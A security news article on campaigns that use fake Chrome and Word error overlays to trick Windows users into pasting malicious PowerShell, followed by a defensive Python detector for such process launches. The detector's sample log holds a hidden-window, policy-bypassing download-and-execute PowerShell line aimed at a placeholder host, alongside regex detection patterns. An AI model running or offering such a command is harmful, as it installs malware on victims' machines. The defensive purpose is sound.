A new wave of malware campaigns is exploiting fake Google Chrome and Microsoft Word errors to deceive unsuspecting users into executing malicious PowerShell commands. Reported by BleepingComputer, these attacks are sophisticated social engineering tactics designed to trick victims into inadvertently installing malware on their Windows PCs.
The campaign employs overlays that mimic legitimate error messages within Chrome and Word interfaces. When users encounter these fake errors, they are prompted to click on a button to copy a supposed “fix” for the issue. However, instead of resolving any legitimate problem, the copied code contains malicious PowerShell commands. Victims are instructed to paste this code into either the Windows Run dialog or PowerShell prompt, unwittingly executing commands that download and install malware.
Proofpoint’s detailed report on this campaign reveals additional attack vectors. Compromised websites host malicious scripts on blockchain platforms such as Binance’s Smart Chain contracts. These scripts initiate a chain of events where visitors are shown a fake Chrome warning, urging them to install a “root certificate” by running a PowerShell script. Once executed, this script verifies the system and downloads further malware payloads, including information-stealing malware.
Furthermore, the campaign includes email-based attacks featuring HTML attachments disguised as Word documents. These attachments prompt recipients to install a “Word Online” extension to view the document. Similar to the web-based attacks, victims are directed to execute PowerShell commands under the guise of fixing an issue. These commands, when run, initiate downloads of malware like Matanbuchus or DarkGate onto the targeted systems.
The effectiveness of these attacks lies in exploiting user trust and urgency, together with users' unfamiliarity with the risks of running unknown PowerShell commands. To protect against such threats, users are advised to exercise caution and refrain from executing code unless they are certain of its legitimacy. Enabling and keeping Windows Defender active can help detect and mitigate malware delivered by these malicious scripts. Additionally, using reputable antivirus software alongside built-in security tools like those from Microsoft can provide enhanced protection against evolving malware threats.
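Beyond user caution, the paste-into-Run step described above leaves a recognisable trace in endpoint telemetry: a PowerShell host spawned by Explorer with a command line that hides its window, bypasses execution policy and fetches code to run in memory. The following is an added example, not code from the original report or from Proofpoint, that scores constructed process-creation records (field names modelled loosely on the parent image and command line that Sysmon Event ID 1 or Security Event 4688 with command-line auditing would supply) and flags the pasted "fix".

```python
import re

# A command pasted into the Win+R Run dialog is launched by Explorer.
PASTE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of the copied "fix" (hypothetical rule set, not a vendor signature).
TRAITS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
]

KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')  # key=value, value optionally double-quoted

def parse_event(line):
    """Parse one constructed key=value process-creation record into a dict."""
    return {k: (q if v.startswith('"') else v) for k, v, q in KV.findall(line)}

def assess(event):
    """Return the traits matched by a PowerShell process launched from Explorer, else []."""
    if event.get("image", "").lower() not in SHELLS:
        return []
    if event.get("parent", "").lower() not in PASTE_PARENTS:
        return []
    cmd = event.get("cmdline", "")
    return [label for rx, label in TRAITS if rx.search(cmd)]

def scan(lines, min_traits=2):
    """Return (timestamp, traits) for every record matching at least min_traits traits."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = assess(ev)
        if len(hits) >= min_traits:
            findings.append((ev.get("ts"), hits))
    return findings

# Constructed sample records, not real telemetry; example.invalid is a placeholder host.
SAMPLE_LOG = [
    'ts=2024-06-17T10:01:05Z parent=explorer.exe image=powershell.exe cmdline="powershell -w hidden -ep bypass -c iex (iwr http://example.invalid/fix)"',
    'ts=2024-06-17T10:02:11Z parent=explorer.exe image=notepad.exe cmdline="notepad.exe C:\\Users\\a\\fix.txt"',
    'ts=2024-06-17T10:03:40Z parent=cmd.exe image=powershell.exe cmdline="powershell -File C:\\scripts\\backup.ps1"',
    'ts=2024-06-17T10:04:02Z parent=explorer.exe image=powershell.exe cmdline="powershell Get-ChildItem"',
]

if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_LOG):
        print(ts, ", ".join(hits))  # only the first record is reported
```

The two-trait threshold keeps an administrator's plain `powershell Get-ChildItem` from the Run dialog out of the findings while still catching the hidden, policy-bypassing download-and-execute one-liner.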
Awareness of these overlay-based tactics is crucial for safeguarding devices and data. By staying informed and vigilant, users can avoid falling victim to deceptive schemes that exploit seemingly genuine software interfaces to deliver harmful payloads.